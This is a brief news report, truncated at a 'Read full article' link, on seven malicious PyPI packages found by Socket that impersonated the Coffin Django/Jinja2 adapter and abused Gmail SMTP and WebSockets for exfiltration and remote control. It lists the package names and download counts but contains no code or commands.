Malicious PyPI packages abuse Gmail, websockets to hijack systems

Seven malicious PyPi packages were found using Gmail's SMTP servers and WebSockets for data exfiltration and remote command execution. The packages were discovered by Socket's threat research team, who reported their findings to the PyPI, resulting in the removal of the packages. However, some of these packages were on PyPI for over four years, and based on third-party download counters, one was downloaded over 18,000 times. Here's the complete list shared by Socket: Coffin-Codes-Pro (9,000 downloads) Coffin-Codes-NET2 (6,200 downloads) Coffin-Codes-NET (6,100 downloads) Coffin-Codes-2022 (18,100 downloads) Coffin2022 (6,500 downloads) Coffin-Grave (6,500 downloads) cfc-bsb (2,900 downloads) The 'Coffin' packages appear to be impersonating the legitimate Coffin package that serves as a lightweight adapter for integrating Jinja2 templates into Django projects. The malicious functionality Socket discovered in these packages centers on covert remote access and data exfiltratio ... Read full article.